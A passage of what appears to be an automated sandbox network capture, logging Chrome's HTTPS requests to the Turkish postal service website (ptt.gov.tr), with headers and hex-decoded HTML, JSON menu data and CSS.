          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:33 UTC609INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:33 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBQb5ENAC3TvoVavOtuCP4trzJ%2BUY%2BjZzYs0xe6tp2EDCx9LwM8aOD%2BRE%2B6eccjB2E9EvZfpb%2FmIgnEwKzmPkWhDAofzBj6x%2FOYD87EJzJq3Ys46sbUelT2qTQxvBRo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad480cbe17fd-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:33 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:33 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          123192.168.2.449868185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:33 UTC679OUTGET /Sayfalar/Posta/DigerPostaIslemleriUst.aspx HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: navigate
          Sec-Fetch-Dest: document
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:33 UTC361INHTTP/1.1 404 Not Found
          Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
          Keep-Alive: timeout=5
          Content-Type: text/html; charset=utf-8
          ETag: "24086-PpQhnccvTvCKbsbvjX2CBnl18+g"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:33 GMT
          Content-Length: 147590
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:33 UTC6910INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2e 2e 2e 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 56 78 30 6d 68 48 70 48 56 57 62 6e 30 63 4f 36 46 44 79 43 30 39 77 38 2d 63 46 59 6a 52 64 30 6d 5f 78 36 42 46 42 5f 5f 41 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65
          Data Ascii: <!DOCTYPE html><html lang="tr"><head><meta name="viewport" content="width=device-width"/><meta charSet="utf-8"/><meta name="description" content="..."/><meta name="google-site-verification" content="bVx0mhHpHVWbn0cO6FDyC09w8-cFYjRd0m_x6BFB__A"/><meta name
          2024-09-01 22:25:33 UTC7271INData Raw: 67 72 65 74 6d 65 6e 6c 65 72 2d 67 75 6e 75 2d 6b 61 6d 70 61 6e 79 61 73 69 22 3e 3c 73 70 61 6e 3e c3 96 c4 9f 72 65 74 6d 65 6e 6c 65 72 20 47 c3 bc 6e c3 bc 20 4b 61 6d 70 61 6e 79 61 73 c4 b1 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 6e 61 66 2d 76 65 2d 73 61 6e 61 74 6b 61 72 6c 61 72 2d 6b 61 6d 70 61 6e 79 61 73 69 22 3e 3c 73 70 61 6e 3e 45 73 6e 61 66 20 76 65 20 53 61 6e 61 74 6b c3 a2 72 6c 61 72 20 4b 61 6d 70 61 6e 79 61 73 c4 b1 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 6b 69 6c 6c 69 2d 65 73 6e 61 66 22 3e 3c 73 70 61 6e 3e 41 6b c4 b1 6c 6c c4 b1 20 45 73 6e 61 66 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20
          Data Ascii: gretmenler-gunu-kampanyasi"><span>retmenler Gn Kampanyas</span></a></li><li><a href="/esnaf-ve-sanatkarlar-kampanyasi"><span>Esnaf ve Sanatkrlar Kampanyas</span></a></li><li><a href="/akilli-esnaf"><span>Akll Esnaf</span></a></li><li><a
          2024-09-01 22:25:33 UTC7271INData Raw: 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 79 75 72 74 2d 69 63 69 2d 70 6f 73 74 61 2d 68 69 7a 6d 65 74 6c 65 72 69 2d 6f 7a 65 6c 2d 68 69 7a 6d 65 74 6c 65 72 22 3e c3 96 7a 65 6c 20 48 69 7a 6d 65 74 6c 65 72 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 73 70 61 6e 3e 59 75 72 74 20 44 c4 b1 c5 9f c4 b1 20 50 6f 73 74 61 20 48 69 7a 6d 65 74 6c 65 72 69 3c 69 20 69 64 3d 22 68 61 73 4c 69 73 74 22 20 63 6c 61 73 73 3d 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 3e 3c 73 70 61 6e 3e 4d 65 6b 74 75 70 20 50 6f 73 74 61 73 c4 b1 20 47 c3 b6 6e 64 65 72 69 6c 65 72 69 3c 69 20 69 64 3d 22 68 61 73 4c 69 73 74 22 20 63 6c
          Data Ascii: </li><li><a href="/yurt-ici-posta-hizmetleri-ozel-hizmetler">zel Hizmetler</a><ul></ul></li></ul></li><li><span>Yurt D Posta Hizmetleri<i id="hasList" class="fa-solid fa-plus"></i></span><ul><li><span>Mektup Postas Gnderileri<i id="hasList" cl
          2024-09-01 22:25:33 UTC7271INData Raw: 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 72 61 2d 74 72 61 6e 73 66 65 72 6c 65 72 69 2d 65 75 72 6f 67 69 72 6f 2d 66 69 6e 61 6e 73 61 6c 2d 73 75 70 65 72 6d 61 72 6b 65 74 2d 65 66 73 2d 70 6f 73 74 61 6c 70 61 79 22 3e 45 46 53 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 72 61 2d 74 72 61 6e 73 66 65 72 6c 65 72 69 2d 6d 6f 6e 65 79 67 72 61 6d 22 3e 4d 6f 6e 65 79 47 72 61 6d 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 72 61 2d 74 72 61 6e 73 66 65 72 6c 65 72 69 2d 70 6f 73 74 61 6c 70 61 79 22 3e 50 6f 73 74 61 6c 50 61 79 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c
          Data Ascii: l></ul></li><li><a href="/para-transferleri-eurogiro-finansal-supermarket-efs-postalpay">EFS</a><ul></ul></li><li><a href="/para-transferleri-moneygram">MoneyGram</a><ul></ul></li><li><a href="/para-transferleri-postalpay">PostalPay</a><ul></ul></li><li><
          2024-09-01 22:25:33 UTC7271INData Raw: 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 74 74 61 76 6d 2e 63 6f 6d 2f 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 62 75 69 6c 64 69 6e 67 22 3e 3c 2f 69 3e 3c 73 70 61 6e 3e 50 74 74 41 56 4d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 69 6c 61 74 65 6c 69 2e 67 6f 76 2e 74 72 2f 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 62 75 69 6c 64 69 6e 67 22 3e 3c 2f 69 3e 3c 73 70 61 6e 3e 65 2d 46 69 6c 61 74 65 6c 69 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e
          Data Ascii: ></a></li><li><a target="_blank" href="https://www.pttavm.com/"><i class="fa-solid fa-building"></i><span>PttAVM</span></a></li><li><a target="_blank" href="https://www.filateli.gov.tr/"><i class="fa-solid fa-building"></i><span>e-Filateli</span></a></li>
          2024-09-01 22:25:33 UTC7271INData Raw: 6d 70 3b 71 3d 37 35 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 64 61 74 61 2d 6e 69 6d 67 3d 22 69 6e 74 72 69 6e 73 69 63 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 22 20 6c 6f
          Data Ascii: mp;q=75" decoding="async" data-nimg="intrinsic" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%" lo
          2024-09-01 22:25:33 UTC7271INData Raw: 65 2c 22 6c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 73 22 3a 5b 7b 22 75 69 64 22 3a 22 33 65 65 36 65 65 39 39 2d 36 34 30 30 2d 34 65 66 32 2d 61 37 63 61 2d 30 39 32 63 38 62 33 32 33 30 65 33 22 2c 22 73 6f 75 72 63 65 55 69 64 22 3a 22 37 39 30 30 64 35 66 32 2d 36 65 64 65 2d 34 34 31 66 2d 39 35 31 31 2d 63 61 65 32 31 31 65 35 66 33 31 32 22 2c 22 6c 61 6e 67 75 61 67 65 49 64 22 3a 31 2c 22 76 61 6c 75 65 22 3a 22 48 47 53 22 2c 22 76 61 6c 75 65 54 79 70 65 22 3a 31 2c 22 73 6c 75 67 22 3a 6e 75 6c 6c 7d 5d 7d 2c 7b 22 75 69 64 22 3a 22 65 37 37 62 36 36 61 39 2d 32 31 39 34 2d 34 64 33 63 2d 38 31 33 34 2d 63 66 33 34 65 35 37 62 63 31 31 35 22 2c 22 6d 65 6e 75 49 64 22 3a 31 30 35 2c 22 70 61 72 65 6e 74 4d 65 6e 75 49 64 22 3a 30 2c 22
          Data Ascii: e,"languageResources":[{"uid":"3ee6ee99-6400-4ef2-a7ca-092c8b3230e3","sourceUid":"7900d5f2-6ede-441f-9511-cae211e5f312","languageId":1,"value":"HGS","valueType":1,"slug":null}]},{"uid":"e77b66a9-2194-4d3c-8134-cf34e57bc115","menuId":105,"parentMenuId":0,"
          2024-09-01 22:25:33 UTC7271INData Raw: 7d 5d 7d 2c 7b 22 75 69 64 22 3a 22 65 62 37 39 65 63 38 39 2d 61 63 38 35 2d 34 66 66 37 2d 38 34 35 38 2d 62 62 36 31 36 30 64 38 65 65 66 61 22 2c 22 6d 65 6e 75 49 64 22 3a 32 32 31 2c 22 70 61 72 65 6e 74 4d 65 6e 75 49 64 22 3a 32 31 37 2c 22 69 63 6f 6e 22 3a 22 22 2c 22 73 6c 75 67 22 3a 22 23 4d 65 67 61 4d 65 6e 75 22 2c 22 75 72 6c 22 3a 6e 75 6c 6c 2c 22 69 73 4d 65 6e 75 4f 70 65 6e 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 73 22 3a 5b 7b 22 75 69 64 22 3a 22 64 61 30 62 30 61 37 66 2d 38 33 65 65 2d 34 34 61 32 2d 39 65 30 30 2d 32 35 33 37 38 62 66 34 35 66 37 36 22 2c 22 73 6f 75 72 63 65 55 69 64 22 3a 22 65 62 37 39 65 63 38 39 2d 61 63 38 35 2d 34 66 66 37 2d 38 34 35 38 2d 62 62 36 31 36 30 64 38 65 65
          Data Ascii: }]},{"uid":"eb79ec89-ac85-4ff7-8458-bb6160d8eefa","menuId":221,"parentMenuId":217,"icon":"","slug":"#MegaMenu","url":null,"isMenuOpen":false,"languageResources":[{"uid":"da0b0a7f-83ee-44a2-9e00-25378bf45f76","sourceUid":"eb79ec89-ac85-4ff7-8458-bb6160d8ee
          2024-09-01 22:25:33 UTC7271INData Raw: 6b 6c 69 2d 62 65 6c 67 65 6c 65 72 22 7d 5d 7d 2c 7b 22 75 69 64 22 3a 22 36 35 66 65 66 64 31 64 2d 39 31 37 37 2d 34 63 35 39 2d 62 38 65 63 2d 39 61 32 63 37 61 36 38 34 37 32 61 22 2c 22 6d 65 6e 75 49 64 22 3a 31 33 39 2c 22 70 61 72 65 6e 74 4d 65 6e 75 49 64 22 3a 31 31 38 2c 22 69 63 6f 6e 22 3a 22 22 2c 22 73 6c 75 67 22 3a 22 23 4d 65 67 61 4d 65 6e 75 22 2c 22 75 72 6c 22 3a 22 22 2c 22 69 73 4d 65 6e 75 4f 70 65 6e 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 73 22 3a 5b 7b 22 75 69 64 22 3a 22 30 63 38 61 39 37 65 30 2d 32 63 64 37 2d 34 33 32 37 2d 61 65 30 38 2d 32 38 64 35 62 66 65 32 35 65 35 64 22 2c 22 73 6f 75 72 63 65 55 69 64 22 3a 22 36 35 66 65 66 64 31 64 2d 39 31 37 37 2d 34 63 35 39 2d 62 38 65 63
          Data Ascii: kli-belgeler"}]},{"uid":"65fefd1d-9177-4c59-b8ec-9a2c7a68472a","menuId":139,"parentMenuId":118,"icon":"","slug":"#MegaMenu","url":"","isMenuOpen":false,"languageResources":[{"uid":"0c8a97e0-2cd7-4327-ae08-28d5bfe25e5d","sourceUid":"65fefd1d-9177-4c59-b8ec
          2024-09-01 22:25:34 UTC7271INData Raw: 34 33 31 35 2d 39 31 63 61 2d 35 38 38 64 37 38 63 37 37 35 65 35 22 2c 22 6c 61 6e 67 75 61 67 65 49 64 22 3a 31 2c 22 76 61 6c 75 65 22 3a 22 54 61 72 69 68 c3 a7 65 22 2c 22 76 61 6c 75 65 54 79 70 65 22 3a 31 2c 22 73 6c 75 67 22 3a 22 70 74 74 2d 70 75 6c 2d 6d 75 7a 65 73 69 2d 74 61 72 69 68 63 65 22 7d 5d 7d 2c 7b 22 75 69 64 22 3a 22 66 39 35 35 66 62 30 33 2d 63 61 32 62 2d 34 39 64 61 2d 62 66 36 32 2d 33 37 32 62 63 38 61 64 63 33 65 34 22 2c 22 6d 65 6e 75 49 64 22 3a 31 31 31 31 33 2c 22 70 61 72 65 6e 74 4d 65 6e 75 49 64 22 3a 31 31 31 31 32 2c 22 69 63 6f 6e 22 3a 22 22 2c 22 73 6c 75 67 22 3a 22 23 4d 65 6e 75 22 2c 22 75 72 6c 22 3a 22 23 50 61 67 65 22 2c 22 69 73 4d 65 6e 75 4f 70 65 6e 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 75 61 67
          Data Ascii: 4315-91ca-588d78c775e5","languageId":1,"value":"Tarihe","valueType":1,"slug":"ptt-pul-muzesi-tarihce"}]},{"uid":"f955fb03-ca2b-49da-bf62-372bc8adc3e4","menuId":11113,"parentMenuId":11112,"icon":"","slug":"#Menu","url":"#Page","isMenuOpen":false,"languag


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          124192.168.2.449869185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:33 UTC606OUTGET /_next/static/css/fdc30eafd5b8da2a.css HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: text/css,*/*;q=0.1
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: style
          Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:33 UTC387INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: text/css; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"2a22e-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:33 GMT
          Content-Length: 172590
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:33 UTC6884INData Raw: 3a 72 6f 6f 74 7b 2d 2d 62 67 43 6f 6c 6f 72 3a 23 66 31 66 31 66 31 3b 2d 2d 70 74 74 47 72 65 65 6e 43 6f 6c 6f 72 3a 23 30 30 61 39 63 65 3b 2d 2d 70 74 74 59 65 6c 6c 6f 77 43 6f 6c 6f 72 3a 23 66 66 63 37 32 63 3b 2d 2d 70 74 74 4c 69 6e 6b 43 6f 6c 6f 72 3a 23 35 33 35 36 35 61 3b 2d 2d 70 72 69 6d 61 72 79 42 67 43 6f 6c 6f 72 3a 23 35 30 61 35 66 66 3b 2d 2d 64 61 72 6b 50 72 69 6d 61 72 79 42 67 43 6f 6c 6f 72 3a 23 30 30 37 63 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 42 67 43 6f 6c 6f 72 3a 23 38 35 38 35 38 35 3b 2d 2d 64 61 72 6b 53 65 63 6f 6e 64 61 72 79 42 67 43 6f 6c 6f 72 3a 23 36 35 36 35 36 35 3b 2d 2d 73 75 63 63 65 73 73 42 67 43 6f 6c 6f 72 3a 23 33 30 63 37 38 31 3b 2d 2d 64 61 72 6b 53 75 63 63 65 73 73 42 67 43 6f 6c 6f 72 3a 23
          Data Ascii: :root{--bgColor:#f1f1f1;--pttGreenColor:#00a9ce;--pttYellowColor:#ffc72c;--pttLinkColor:#53565a;--primaryBgColor:#50a5ff;--darkPrimaryBgColor:#007cff;--secondaryBgColor:#858585;--darkSecondaryBgColor:#656565;--successBgColor:#30c781;--darkSuccessBgColor:#
          2024-09-01 22:25:33 UTC7271INData Raw: 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 73 6d 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 7b 62 6f 72 64 65 72 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 2e 39 38 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 64 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 7b 62 6f 72 64 65 72 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 2e 39 38 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f
          Data Ascii: able-responsive-sm>.table-bordered{border:0}}@media (max-width:767.98px){.table-responsive-md{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch}.table-responsive-md>.table-bordered{border:0}}@media (max-width:991.98px){.table-respo
          2024-09-01 22:25:34 UTC7271INData Raw: 74 68 3a 32 72 65 6d 3b 68 65 69 67 68 74 3a 32 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 66 6f 6e 74 57 65 69 67 68 74 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 72 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 6d 6f 64 61 6c 3e 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 3e 2e 6d 6f 64 61 6c 2d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 31 72 65 6d 20 32 72 65 6d 7d 2e 6d 6f 64 61 6c 3e 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 3e 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61
          Data Ascii: th:2rem;height:2rem;border-radius:50%;color:#fff;font-size:1.2rem;font-weight:var(--fontWeight);text-align:center;line-height:2rem;cursor:pointer}.modal>.modal-content>.modal-body{padding:1rem 2rem}.modal>.modal-content>.modal-footer{display:flex;flex-wra
          2024-09-01 22:25:34 UTC7271INData Raw: 6d 61 72 6b 2d 73 69 7a 65 29 20 2f 20 32 2e 36 29 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 63 61 6c 63 28 76 61 72 28 2d 2d 63 6b 2d 74 6f 64 6f 2d 6c 69 73 74 2d 63 68 65 63 6b 6d 61 72 6b 2d 73 69 7a 65 29 20 2f 20 38 29 20 63 61 6c 63 28 76 61 72 28 2d 2d 63 6b 2d 74 6f 64 6f 2d 6c 69 73 74 2d 63 68 65 63 6b 6d 61 72 6b 2d 73 69 7a 65 29 20 2f 20 38 29 20 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 7d 2e 63 6b 2d 65 64 69 74 6f 72 5f 5f 65 64 69 74 61 62 6c 65 2e 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 74 6f 64 6f 2d 6c 69 73 74 20 2e 74 6f 64 6f 2d 6c 69 73 74 5f 5f 6c 61 62 65 6c 3e 73
          Data Ascii: mark-size) / 2.6);border-style:solid;border-color:transparent;border-width:0 calc(var(--ck-todo-list-checkmark-size) / 8) calc(var(--ck-todo-list-checkmark-size) / 8) 0;transform:rotate(45deg)}.ck-editor__editable.ck-content .todo-list .todo-list__label>s
          2024-09-01 22:25:34 UTC7271INData Raw: 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28
          Data Ascii: --fa-animation-iteration-count,infinite);animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{animation-name:fa-fade;animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-timing-function:var(
          2024-09-01 22:25:34 UTC7271INData Raw: 2c 2e 66 61 2d 73 70 61 67 68 65 74 74 69 2d 6d 6f 6e 73 74 65 72 2d 66 6c 79 69 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 37 62 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 75 70 2d 61 63 72 6f 73 73 2d 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 34 61 66 22 7d 2e 66 61 2d 73 70 6f 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 75 74 65 6e 73 69 6c 2d 73 70 6f 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 65 35 22 7d 2e 66 61 2d 6a 61 72 2d 77 68 65 61 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 31 37 22 7d 2e 66 61 2d 65 6e 76 65 6c 6f 70 65 73 2d 62 75 6c 6b 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6d 61 69 6c 2d 62 75 6c 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74
          Data Ascii: ,.fa-spaghetti-monster-flying:before{content:"\f67b"}.fa-arrow-down-up-across-line:before{content:"\e4af"}.fa-spoon:before,.fa-utensil-spoon:before{content:"\f2e5"}.fa-jar-wheat:before{content:"\e517"}.fa-envelopes-bulk:before,.fa-mail-bulk:before{content
